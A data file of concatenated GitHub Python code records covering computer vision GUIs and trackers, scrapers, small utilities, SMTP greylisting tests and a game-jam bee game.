break\n\n out.write(frame_motion) # 保存\n\nout.release()\ncap.release()\ncv.destroyAllWindows()","repo_name":"070411209/GAAS-Object-Tracking","sub_path":"KCF/python/testBS.py","file_name":"testBS.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"35505576192","text":"import cv2\nimport sys\nfrom PyQt5.QtCore import * \nfrom PyQt5.QtGui import * \nfrom PyQt5.QtWidgets import * \nimport mediapipe as mp\nimport time\nimport threading\nimport argparse\n\n\nclass Thread(QThread):\n \n changePixmap = pyqtSignal(QImage)\n frame_buffer = []\n\n def read_frames(self, path_to_video_file):\n \"\"\"method to read all frames in video regardless (to be run in a parallel thread to processing code)\"\"\"\n global frame_buffer\n cap = cv2.VideoCapture(path_to_video_file)\n done = False\n while not done:\n ret, image = cap.read()\n if not ret:\n done = True\n return\n else:\n self.frame_buffer.append(image)\n \n\n def process_image(self, image):\n \"\"\"adds annotations to image for the models you have selected, \n For now, it just depict results from hand detection\n TODO: add all models, and link with radio buttons on UI\n \"\"\"\n global hand_detection_toggle\n global face_mesh_toggle\n global pose_detection_toggle\n\n\n hand_detection_results = None\n face_mesh_results = None\n pose_results = None\n\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # hand detection\n if hand_detection_toggle:\n with mp_hands.Hands(\n max_num_hands=1000,\n model_complexity=0,\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5) as hands:\n hand_detection_results = hands.process(image)\n\n\n # face mesh\n if face_mesh_toggle:\n with mp_face_mesh.FaceMesh(\n static_image_mode=True,\n refine_landmarks=True,\n max_num_faces=1000,\n min_detection_confidence=0.5) as face_mesh:\n face_mesh_results = face_mesh.process(image)\n \n\n if pose_detection_toggle:\n with mp_pose.Pose(\n static_image_mode=True, min_detection_confidence=0.5, model_complexity=2) as pose:\n pose_results = pose.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n \n\n\n # annotations of results onto image\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n \n \n # hand-detection annotations\n if hand_detection_toggle and hand_detection_results and hand_detection_results.multi_hand_landmarks:\n for hand_landmarks in hand_detection_results.multi_hand_landmarks:\n mp_drawing.draw_landmarks(\n image,\n hand_landmarks,\n mp_hands.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style())\n \n # face-mesh annotations\n if face_mesh_toggle and face_mesh_results and face_mesh_results.multi_face_landmarks:\n for face_landmarks in face_mesh_results.multi_face_landmarks:\n mp_drawing.draw_landmarks(\n image=image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_TESSELATION,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_tesselation_style())\n mp_drawing.draw_landmarks(\n image=image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_CONTOURS,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_contours_style())\n mp_drawing.draw_landmarks(\n image=image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_IRISES,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_iris_connections_style())\n \n # pose detection annotations\n if pose_detection_toggle and pose_results and pose_results.pose_landmarks:\n mp_drawing.draw_landmarks(\n image,\n pose_results.pose_landmarks,\n mp_pose.POSE_CONNECTIONS,\n landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style()) \n\n return image\n\n\n def emit_signal(self, image):\n rgbImage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n h, w, ch = rgbImage.shape\n bytesPerLine = ch * w\n convertToQtFormat = QImage(rgbImage.data, w, h, bytesPerLine, QImage.Format_RGB888)\n p = convertToQtFormat.scaled(HEIGHT, WIDTH, Qt.KeepAspectRatio)\n self.changePixmap.emit(p)\n return\n\n\n def window_update_prerecorded(self, PATH):\n # PATH = \"/Users/saahith/Desktop/mediapipe-GUI/test2.mp4\"\n cap = cv2.VideoCapture(PATH)\n frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)\n fps = int(cap.get(cv2.CAP_PROP_FPS))\n duration = frames/fps\n start = time.time()\n \n while True:\n current_time = time.time()\n frame_index = int((current_time - start)/duration * frames)\n if frame_index < len(self.frame_buffer):\n print(\"index: \", frame_index)\n print(\"length of buffer: \", len(self.frame_buffer))\n image = self.frame_buffer[frame_index]\n image = self.process_image(image)\n self.emit_signal(image)\n\n def window_update_webcam(self):\n while True:\n if len(self.frame_buffer) > 0:\n image = self.frame_buffer[-1]\n image = self.process_image(image)\n self.emit_signal(image)\n\n\n def run(self):\n global VIDEO_PATH\n # use_webcam = True\n # PATH = \"/Users/saahith/Desktop/mediapipe-GUI/test.mp4\"\n # if PATH==0:\n # PATH = 0\n t1 = threading.Thread(target=self.read_frames, args=(VIDEO_PATH,))\n if VIDEO_PATH == 0:\n t2 = threading.Thread(target=self.window_update_webcam, args=())\n else:\n t2 = threading.Thread(target=self.window_update_prerecorded, args=(VIDEO_PATH,))\n\n # \n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n\n\n\n\nclass App(QMainWindow):\n def __init__(self):\n super().__init__()\n self.title = 'MediaPipe GUI'\n self.left = 100\n self.top = 100\n self.width = HEIGHT\n self.height = WIDTH\n self.initUI()\n\n @pyqtSlot(QImage)\n def setImage(self, image):\n self.label.setPixmap(QPixmap.fromImage(image))\n\n def initUI(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.resize(1800, 1200)\n # create a label\n self.label = QLabel(self)\n self.label.move(325, 120)\n\n\n self.label.resize(WIDTH, HEIGHT)\n th = Thread(self)\n th.changePixmap.connect(self.setImage)\n th.start()\n\n\n # Hand detection toggle button\n self.hand_detection_button = QPushButton(\"Hand Detection\", self)\n self.hand_detection_button.setGeometry(525, 150, 100, 40)\n self.hand_detection_button.setCheckable(True)\n self.hand_detection_button.clicked.connect(self.hand_detection_toggle_switch)\n self.hand_detection_button.setStyleSheet(\"background-color : lightgrey\")\n\n\n # face mesh toggle\n self.face_mesh_button = QPushButton(\"Face Mesh\", self)\n self.face_mesh_button.setGeometry(675, 150, 100, 40)\n self.face_mesh_button.setCheckable(True)\n self.face_mesh_button.clicked.connect(self.face_mesh_toggle_switch)\n self.face_mesh_button.setStyleSheet(\"background-color : lightgrey\")\n\n # pose_detection toggle\n self.pose_detection_button = QPushButton(\"Pose Detection\", self)\n self.pose_detection_button.setGeometry(825, 150, 100, 40)\n self.pose_detection_button.setCheckable(True)\n self.pose_detection_button.clicked.connect(self.pose_detection_toggle_switch)\n self.pose_detection_button.setStyleSheet(\"background-color : lightgrey\")\n\n self.update()\n self.show()\n\n\n def hand_detection_toggle_switch(self):\n global hand_detection_toggle\n hand_detection_toggle = not hand_detection_toggle\n if self.hand_detection_button.isChecked():\n self.hand_detection_button.setStyleSheet(\"background-color : lightblue\")\n else:\n self.hand_detection_button.setStyleSheet(\"background-color : lightgrey\")\n \n def face_mesh_toggle_switch(self):\n global face_mesh_toggle\n face_mesh_toggle = not face_mesh_toggle\n if self.face_mesh_button.isChecked():\n self.face_mesh_button.setStyleSheet(\"background-color : lightblue\")\n else:\n self.face_mesh_button.setStyleSheet(\"background-color : lightgrey\")\n \n def pose_detection_toggle_switch(self):\n global pose_detection_toggle\n pose_detection_toggle = not pose_detection_toggle\n if self.pose_detection_button.isChecked():\n self.pose_detection_button.setStyleSheet(\"background-color : lightblue\")\n else:\n self.pose_detection_button.setStyleSheet(\"background-color : lightgrey\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\"Run MediaPipe models on specified video feed\")\n parser.add_argument('video_feed', default='webcam', nargs='?')\n\n\n mp_drawing = mp.solutions.drawing_utils\n mp_drawing_styles = mp.solutions.drawing_styles\n\n\n mp_hands = mp.solutions.hands\n mp_face_mesh = mp.solutions.face_mesh\n mp_pose = mp.solutions.pose\n\n\n WIDTH = 1000\n HEIGHT = 800\n\n hand_detection_toggle = False\n face_mesh_toggle = False\n pose_detection_toggle = False\n\n\n VIDEO_PATH = 0\n args = parser.parse_args()\n if args.video_feed.lower() != 'webcam':\n VIDEO_PATH = args.video_feed\n \n app = QApplication(sys.argv)\n ex = App()\n sys.exit(app.exec_())\n","repo_name":"saahithjanapati/mediapipe-GUI","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":10243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"30397664365","text":"\nimport requests\n\ndef getTargetedTaxonomicOrFunctionalGroupItem(\n host\n # Path parameters\n , \n path_id\n \n \n \n ,\n # Headers\n headers = None\n):\n final_path = \"/targeted_taxonomic_or_functional_groups/{id}\".format(\n id = path_id\n )\n \n \n \n response = requests.get(\n url = host + final_path,\n headers = headers \n )\n\n return response\n\n ","repo_name":"guilhemheinrich/deepomics-python-client","sub_path":"src/getTargetedTaxonomicOrFunctionalGroupItem.py","file_name":"getTargetedTaxonomicOrFunctionalGroupItem.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70445195512","text":"import os\nimport shutil\nimport warnings\n# import cv2\nimport io\n \nfrom PIL import Image\nwarnings.filterwarnings(\"error\", category=UserWarning)\n \nbase_dir = \"./dataset\"\n\ndef is_read_successfully(file):\n try:\n imgFile = Image.open(file)\n return True\n except Exception:\n return False\n\n\ni = 0\nfor r in os.listdir(base_dir):\n if r=='.DS_Store':#在这里我们在 .DS_Store 跳过,如果要是有需要的删除.DS_Store文件,可以进行微调\n print(base_dir,r)\n continue \n print(r)\n for j in os.listdir(os.path.join('./dataset',r)):\n if not is_read_successfully(f\"{base_dir}/{r}/{j}\"):\n i = i+1\n print(i)\n\n","repo_name":"boyzwj/gan_tool","sub_path":"fixdata.py","file_name":"fixdata.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"70517637433","text":"import sys\nfrom collections import defaultdict\n\ninput = sys.stdin.readline\n\n\nN,M = map(int,input().split())\n\n\nn_dict = defaultdict(int)\n\nfor _ in range(N):\n n_dict[input().rstrip()]\n\n\nfor _ in range(M):\n k = input().rstrip()\n \n if k in n_dict:\n n_dict[k] += 1\n\nsum = 0\nfor i in n_dict.values():\n sum += i\n\nprint(sum)\n\n\n","repo_name":"enaa99/-Python","sub_path":"baekjoonPython/string/14425문자열 집합.py","file_name":"14425문자열 집합.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"73819460471","text":"from orca_dataset_generator import DataGenerator\r\nif __name__ == \"__main__\":\r\n\r\n \"\"\"One can create an instance of the “DataGenerator” class. It takes 4 arguments-\r\n 1.\ttrain_orca_calls_path- Path to the directory containing isolated orca vocals to be used for training.\r\n 2.\ttrain_noise_path- Path to the directory containing noise (from boats,ships,etc.) to be overlapped with\r\n orca vocals for training.\r\n 3.\tval_orca_calls_path- Path to the directory containing isolated orca vocals to be used for validation.\r\n 4.\tval_noise_path- Path to the directory containing noise (from boats,ships,etc.) to be overlapped with\r\n orca vocals for validation.\r\n \"\"\"\r\n\r\n generator = DataGenerator(train_orca_calls_path=\"training_data/calls\",\r\n train_noise_path=\"training_data/noise\",\r\n val_orca_calls_path=\"validation_data/calls\",\r\n val_noise_path=\"validation_data/noise\")\r\n\r\n \"\"\"Next one can call the member function “generate_dataset” to generate their custom dataset. This function also\r\n takes 4 parameters as arguments-\r\n 1.\ttraining_dataset_size- Size of the training dataset.\r\n 2.\tvalidation_dataset_size- Size of the validation dataset.\r\n 3.\toutput_path- Directory where you want to save the dataset.\r\n 4.\tchannels- The number of channels- single channel (mono) or double channel (stereo), you want\r\n in the generated audio files.\r\n \"\"\"\r\n generator.generate_dataset(training_dataset_size=500,\r\n validation_dataset_size=100,\r\n output_path=\"generated_dataset\",\r\n channels=2)\r\n","repo_name":"orcasound/acoustic-separation","sub_path":"Dataset_generator/generate_dataset.py","file_name":"generate_dataset.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"38738415555","text":"# %%\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nmain_folder = \"../../\"\n\n# %%\n\ndata_Cpp = []\nchunk_size = 1_000_000\nalg = \"_Spec\"\n\nwith open(f\"{main_folder}results/Cpp_Python/{chunk_size}_Cpp{alg}.txt\", \"r\") as f:\n for line in f.readlines():\n data_Cpp.append(float(line))\n\ndata_Cpp = np.array(data_Cpp)\n\ndata_Python_Cpp = []\n\nwith open(f\"{main_folder}results/Cpp_Python/{chunk_size}_Python_Cpp{alg}.txt\", \"r\") as f:\n for line in f.readlines():\n data_Python_Cpp.append(float(line))\n\ndata_Python_Cpp = np.array(data_Python_Cpp[:len(data_Cpp)])\n\ndata_Python = []\n\nwith open(f\"{main_folder}results/Cpp_Python/{chunk_size}_Python{alg}.txt\", \"r\") as f:\n for line in f.readlines():\n data_Python.append(float(line))\n\ndata_Python = np.array(data_Python[:len(data_Cpp)])\n\nplt.rc('xtick', labelsize=15) \nplt.rc('ytick', labelsize=15)\n\nplt.rc('axes', labelsize=20)\nline_width=2\n\nplt.plot(data_Cpp, linewidth=line_width, label = \"C++\")\nplt.plot(data_Python, linewidth=line_width, label = \"Python\")\nplt.plot(data_Python_Cpp, linewidth=line_width, label = \"Hybrid\")\nplt.legend(prop={'size': 15})\n\nplt.tight_layout()\nplt.savefig(f\"{main_folder}results/Images/Interface/{chunk_size}.png\")\n\nplt.show()\n# %%\n\n\ndiff_Cpp = data_Cpp[1:] - data_Cpp[:-1]\ndiff_Python = data_Python[1:] - data_Python[:-1]\ndiff_Python_Cpp = data_Python_Cpp[1:] - data_Python_Cpp[:-1]\n\n# %%\nnum_batches = 100\nchunks = range(0, len(diff_Python), num_batches)\nbatches = [x for x in range(len(diff_Python)) if x % num_batches != 0]\n \n# %%\n\nplt.hist(diff_Cpp[chunks], alpha=0.8, label = \"C++\")\nplt.hist(diff_Python[chunks], alpha=0.8, label = \"Python\")\nplt.hist(diff_Python_Cpp[chunks], alpha=0.8, label = \"Hybrid\")\nplt.legend()\nplt.show()\n\n# %%\n\n\nprint(diff_Cpp[-1])\n","repo_name":"DanteNiewenhuis/TMVA-batching","sub_path":"Python_files/analysis/analyse_Interface.py","file_name":"analyse_Interface.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"30404596493","text":"import re\nimport requests\nimport json\n\ndef remove_time_stamp(content):\n if not content:\n return content\n # Remove time stamp\n new_content = re.sub(r\"\\d{2}:\\d{2}:\\d{2}\", \"\", content)\n new_content = re.sub(r\"\\[\\d{4}-\\d{2}-\\d{2}.*?\\]\", \"\", new_content)\n return new_content\n\ndef extract_quotation_content(content):\n pattern = \"\\`\\`\\`([\\s\\S]*?)\\`\\`\\`\"\n substring = re.findall(pattern, content)\n if (len(substring) >= 1):\n result=' '.join(substring)\n return result\n\ndef query_trss_for_jenkins_output(jenkins_url, test_name, trss_servers=[\"https://trss.adoptium.net\"]):\n #Get build info from TRSS\n query_url = \"https://trss.adoptium.net/api/parseJenkinsUrl\"\n query_params = {\"jenkinsUrl\": jenkins_url}\n output = requests.get(query_url, query_params)\n output_dict = json.loads(output.content)\n\n if \"output\" not in output_dict:\n raise Exception(\"No response received from TRSS while parsing Jenkins Url\")\n return \"\"\n\n output_dict = output_dict[\"output\"]\n\n if output_dict[\"errorMsg\"]:\n raise Exception(\"Failed to parse Jenkins Url with error message: \" + output_dict[\"errorMsg\"])\n return \"\"\n\n url = output_dict[\"serverUrl\"]\n build_name = output_dict[\"buildName\"]\n build_num = output_dict[\"buildNum\"]\n\n query_params = {\"url\": url,\n \"buildName\": build_name,\n \"buildNum\": build_num,\n \"testName\": test_name,}\n\n print(\"Query parameters:\")\n print(query_params)\n\n for server in trss_servers:\n #Try to fetch test data from server\n query_url = f\"{server}/api/getOutputByTestInfo\"\n print(f\"\\nQuerying url: {query_url}\")\n\n output = requests.get(query_url, query_params)\n data = json.loads(output.content)\n\n if \"output\" in data:\n return data[\"output\"]\n\n\n print(\"Couldn't find data for test\")\n return \"\"\n\ndef extract_jenkins_link_and_testname(content):\n jenkins_links = []\n test_names = []\n\n splitted_content = content.split()\n pattern = r\"(https:\\/\\/.+\\/job\\/Test_openjdk\\d+.+\\/\\d+)\"\n for word in splitted_content:\n adoptium_jenkins_links = re.findall(pattern, word)\n jenkins_links += adoptium_jenkins_links\n\n pattern2 = r\"(?<=\\`)Test_openjdk\\d+.+?\\/?(?=\\`)\"\n internal_jenkins_job_names = re.findall(pattern2, content)\n extracted_internal_links = [''.join(('https://internal_jenkins/job/',x)) for x in internal_jenkins_job_names]\n jenkins_links += extracted_internal_links\n\n pattern3 = r\"[a-zA-Z].+\\d+(?=_FAILED)\" # For \"testname_FAILED\" to testname\n for word in splitted_content:\n extracted_test = re.findall(pattern3, word)\n test_names += extracted_test\n\n pattern4 = r\"(?<=Test Name: ).+_\\d+\" # \"Test Name: HCRLateAttachWorkload_0\" to \"HCRLateAttachWorkload_0\"\n special_test_names = re.findall(pattern4, content)\n test_names += special_test_names\n\n return jenkins_links, test_names\n","repo_name":"payalharisinghani/aqa-test-tools","sub_path":"MachineLearningPrototype/utils/preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"20881991059","text":"import sqlite3\nconn = sqlite3.connect('example.db')\n\nc = conn.cursor()\n\n# Do this instead\nt = ('RHAT',)\nc.execute('SELECT * FROM stocks WHERE symbol=?', t)\n\n\nprint('Chapter table has these columns:')\nfor column_info in c.description:\n print(column_info)\n\n\n# We can also close the connection if we are done with it.\n# Just be sure any changes have been committed or they will be lost.\nconn.close()","repo_name":"Naresh-Chaurasia/AdvancedPython-DataScience-MachineLearning","sub_path":"com.c2t.db.sqlite/06-SQLite-select-meta.py","file_name":"06-SQLite-select-meta.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70331796472","text":"import cv2\nimport sys\n\n\ndef main():\n # trackers covered in this scope-\n # KCF, MIL, TLD, CSRT\n cap = cv2.VideoCapture(\"/home/sabbir/Videos/sattelite.m4v\")\n tracker = cv2.TrackerMIL_create()\n\n bbox = None\n msg = None\n box = None\n while True:\n ret, frame = cap.read()\n if not ret:\n print(\"[ERROR] Parsing is false\")\n\n if bbox is not None:\n msg, box = tracker.update(frame)\n \n if msg:\n x, y, w, h = [p for p in box]\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 200, 3), 1)\n\n cv2.imshow(f\"MIL Tracker\", frame)\n\n if cv2.waitKey(10) & 0xff == 27:\n break\n if cv2.waitKey(10) & 0xff == ord('t'):\n bbox = cv2.selectROI(\"Select box to track\", frame, fromCenter=False,\n\t\t\tshowCrosshair=True)\n tracker.init(frame, bbox)\n \n cap.release()\n cv2.destroyAllWindows()\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"by-sabbir/sabbir.dev-blogposts","sub_path":"object-tracker/mil_tracker.py","file_name":"mil_tracker.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"37257723756","text":"import cv2 \nimport sqlite3\n\ncam = cv2.VideoCapture(0)\ndetector=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\ndef InsertndUpdate(id,name,department,gender,course_name):\n conn = sqlite3.connect(\"studentsFaceData.db\")\n cmd = \"SELECT * FROM students WHERE roll=\"+ str(id)\n cursor = conn.execute(cmd)\n existence = 0\n for row in cursor:\n existence = 1\n if(existence == 1):\n change = input('Roll number already exists do you want to replace it?(y/n):')\n if(change == 'y'):\n cmd = \"UPDATE students SET name=\"+str(name)+\" WHERE roll=\"+str(id)\n else:\n print(\"no change made\")\n conn.close()\n else:\n cmd = \"INSERT INTO students(roll,name,department,gender,studying) Values(\"+str(id)+\",\"+str(name)+\",\"+str(department)+\",\"+str(gender)+\",\"+str(course_name)+\")\"\n conn.execute(cmd)\n conn.commit()\n conn.close()\n\n\nroll_no = input('enter the roll no: ')\nname = input('Enter the name: ')\ncourse_name = input(\"Enter Course name(B.E/B.sc..):\")\ndepartment = input(\"Enter the department:\")\ngender = input(\"enter the gender:\")\nInsertndUpdate(roll_no,name,department,gender,course_name)\n\n\ni = 0 \n\nwhile 1:\n ret, img = cam.read()\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n face = detector.detectMultiScale(gray_img, 1.3, 5)\n\n for (x,y,w,h) in face:\n cv2.rectangle( img, (x,y), (x+w,y+h), (255,255,0), 1)\n cv2.imwrite(\"face_data/students.\"+roll_no+'.'+str(i)+\".jpg\",gray_img[y:y+h,x:x+w])\n i += 1\n cv2.imshow('Data Creator',img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n elif i>100:\n break\n\ncam.release()\ncam.destroyAllWindows()","repo_name":"holmesvinn/Attendance","sub_path":"datasetCreator.py","file_name":"datasetCreator.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15330301730","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\nimport csv\n\n\nclass MaoyanPipeline:\n def open_spider(self, spider):\n self.file = open('maoyan.csv', 'w', newline='', encoding='utf-8-sig')\n self.writer = csv.writer(self.file)\n self.writer.writerow(['movie_id',\n 'movie_name',\n 'sum_box_desc',\n 'box_desc',\n 'box_rate',\n 'show_count_rate',\n 'seat_count_rate'])\n\n def process_item(self, item, spider):\n self.writer.writerow([item['movie_id'],\n item['movie_name'],\n item['sum_box_desc'],\n item['box_desc'],\n item['box_rate'],\n item['show_count_rate'],\n item['seat_count_rate']])\n return item\n\n def close_spider(self, spider):\n self.file.close()\n","repo_name":"Kameees/movie_spider","sub_path":"maoyan/maoyan/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"36963849321","text":"\"\"\"Tests for greylisting service\"\"\"\nimport pytest\nfrom smtplib import SMTP, SMTPRecipientsRefused\nimport logging\n\nfrom chapps.tests.test_policy.conftest import clear_redis_grl, populate_redis_grl\nfrom services.tests.conftest import known_sender\n\n\ndef test_chapps_grl_first_attempt_denied(\n caplog,\n clear_redis_grl,\n chapps_grl_service,\n known_sender,\n grl_test_recipients,\n grl_test_message_factory,\n):\n \"\"\"\n GIVEN a new email delivery attempt, for an unrecognized tuple\n WHEN presented for delivery\n THEN it should be denied\n \"\"\"\n caplog.set_level(logging.DEBUG)\n message = grl_test_message_factory(known_sender, grl_test_recipients)\n with SMTP(\"127.0.0.1\") as smtp:\n with pytest.raises(SMTPRecipientsRefused):\n assert smtp.sendmail(known_sender, grl_test_recipients, message)\n\n\ndef test_chapps_grl_acceptance_after_deferral(\n caplog,\n chapps_grl_service_with_tuple,\n known_sender,\n grl_test_recipients,\n grl_test_message_factory,\n):\n \"\"\"\n GIVEN an email is being retried after deferral (the tuple has been seen)\n WHEN presented for delivery\n THEN it should be accepted (using DUNNO to allow other filters)\n \"\"\"\n caplog.set_level(logging.DEBUG)\n message = grl_test_message_factory(known_sender, grl_test_recipients)\n with SMTP(\"127.0.0.1\") as smtp:\n result = smtp.sendmail(known_sender, grl_test_recipients, message)\n assert True # email was accepted\n\n\ndef test_chapps_grl_accept_emails_from_proven_clients(\n caplog,\n chapps_grl_service_with_tally,\n known_sender,\n grl_test_recipients,\n grl_test_message_factory,\n):\n \"\"\"\n GIVEN a new email, but from a recognized-reliable client (source IP)\n WHEN presented for delivery\n THEN it should be accepted (using DUNNO to allow other filters)\n \"\"\"\n caplog.set_level(logging.DEBUG)\n message = grl_test_message_factory(known_sender, grl_test_recipients)\n with SMTP(\"127.0.0.1\") as smtp:\n result = smtp.sendmail(known_sender, grl_test_recipients, message)\n assert True # if we get here w/o error, the email was accepted\n","repo_name":"easydns/chapps","sub_path":"services/tests/test_greylisting/test_greylisting.py","file_name":"test_greylisting.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"95"} +{"seq_id":"39115997273","text":"from functools import lru_cache\nfrom dateutil import parser\nimport time\nfrom collections import namedtuple\n\nfrom base_scraper import BaseScraper\n\nBASE_URL = \"http://taboracademy.net/nessa/\"\n\n\nSchool = namedtuple('School', 'id name')\nRace = namedtuple('Race', 'school_id opponent_id date school_score opponent_score')\n\nNAME_MAPPINGS = {\n 'Bishop Hendricken High School' : 'Bishop Hendricken HS',\n 'Bishop Hendricken HS': 'Bishop Hendricken HS',\n 'Boston Latin School':'Boston Latin High School',\n 'Portland HS':'Portland High School',\n \"St. Sebastian's Country Day School\":\"St Sebastian's School\",\n 'Sturgis East Charter School':'Sturgis Charter School',\n 'Swampscott High School':'Swampscott HS',\n 'Valley Regional High School ':'Valley Regional High School',\n 'Valley Regional High School \\xa0':'Valley Regional High School'\n}\n\n\nclass ResultsScraper(BaseScraper):\n def __init__(self, schools, races, url, link):\n self.schools = schools\n self.races = races\n self.name = link.text_content()\n self.url = url + link.attrib['href']\n\n def _school(self, name=None):\n name = NAME_MAPPINGS.get(name or self.name, name or self.name)\n school = self.schools.get(name, School(name=name, id=name))\n self.schools[school.id] = school\n return school\n\n def _create_race(self, match):\n print(match)\n results = [int(s) for s in match['Score'].replace(\" \", \"\").split(\"-\") if s != \"\"]\n school_score, opponent_score = results\n date = parser.parse(match['Date'])\n opponent_name = match['Opponent'].replace('At ', '')\n opponent_school = self._school(opponent_name)\n school_score, opponent_score = sorted(results, reverse=match['Result'] == 'Win')\n race = Race(school_id=self._school().id, opponent_id=opponent_school.id, date=date.date(), school_score=school_score, opponent_score=opponent_score)\n self.races[self._school().id].append(race)\n\n def scrape(self):\n while True:\n try:\n tr_elements = self._doc.xpath('//tr')\n break\n except:\n time.sleep(1)\n\n columns = [t.text_content() for t in tr_elements[0]]\n for elem in tr_elements[1:]:\n match = {}\n for col, val in zip(columns, elem):\n match[col] = val.text_content()\n self._create_race(match)\n return True\n","repo_name":"mebling/nessa_standings","sub_path":"results_scraper.py","file_name":"results_scraper.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"24388274303","text":"# Global Game Jam 2020\n# 2020-01-31 bis 2020-02-03\n\n# import\nimport os\nimport pygame\nimport numpy as np\nimport threading\nimport subprocess\n\nfrom map import Map\n\nimport random\nimport queue\nimport time\n\nfrom bee import Bee\nfrom htmlhandler import make_app\nimport tornado\nimport hive\nfrom constants import *\n\nimport bot\nfrom asset import Flower, Intruder, Wax, Weapon\nfrom constants import FPS\n\nimport colorsys\n\npygame.init()\n\ncurrent_path = os.path.dirname(__file__)\n\n\n# initialize the pygame module\n# load and set the logo\npygame.display.set_caption(\"First Try\")\n\nclass GameManager:\n def __init__(self, telegram=False, temperature_game_over=True):\n # Define Screen Size\n self.disp_height = DISP_HEIGHT\n self.disp_width = DISP_WIDTH\n\n self.t0 = time.time()\n\n # self.screen = pygame.display.set_mode((self.disp_width, self.disp_height))\n self.screen = pygame.display.set_mode((0,0),pygame.FULLSCREEN)\n\n self.grid_height = GRID_HEIGHT\n self.grid_width = GRID_WIDTH\n\n self.map = Map(self.grid_height, self.grid_width)\n\n self.bees = {\n }\n\n self.thermometer = pygame.image.load(os.path.join(current_path, 'Thermometer_grey.png'))\n self.game_over_win = pygame.image.load(os.path.join(current_path, 'Game_Finished_Repaired.png'))\n self.game_over_heat = pygame.image.load(os.path.join(current_path, 'Game_Finished_T_high.png'))\n self.game_over_cold = pygame.image.load(os.path.join(current_path, 'Game_Finished_T_low.png'))\n\n h = self.game_over_win.get_height()\n w = self.game_over_win.get_width()\n scale = min(0.8 * DISP_HEIGHT/h, 0.8 * DISP_WIDTH/w)\n\n self.game_over_win = pygame.transform.scale(self.game_over_win, (int(w * scale), int(h * scale)))\n self.game_over_heat = pygame.transform.scale(self.game_over_heat, (int(w * scale), int(h * scale)))\n self.game_over_cold = pygame.transform.scale(self.game_over_cold, (int(w * scale), int(h * scale)))\n\n self.queue = queue.Queue(maxsize=10)\n\n self.webserver = make_app(self.queue)\n self.webserver.listen(8090)\n\n self.hive = hive.Hive(self.grid_height, self.grid_width)\n\n self.tornado_target = tornado.ioloop.IOLoop.current()\n self.tornado_thread = threading.Thread(target=self.tornado_target.start)\n self.tornado_thread.start()\n\n self.bot_queue = queue.Queue()\n if telegram:\n self.bot = bot.Bot(self.bot_queue)\n\n self.temperature = 150\n self.temperature_game_over = temperature_game_over\n self.temperature_limits = [0, 210]\n\n background_path = os.path.join(current_path, 'background_bees.ogg')\n dance_path = os.path.join(current_path, 'wild_bees.ogg')\n\n\n self.base_volume = 0.2\n self.background_sound = pygame.mixer.Sound(background_path)\n 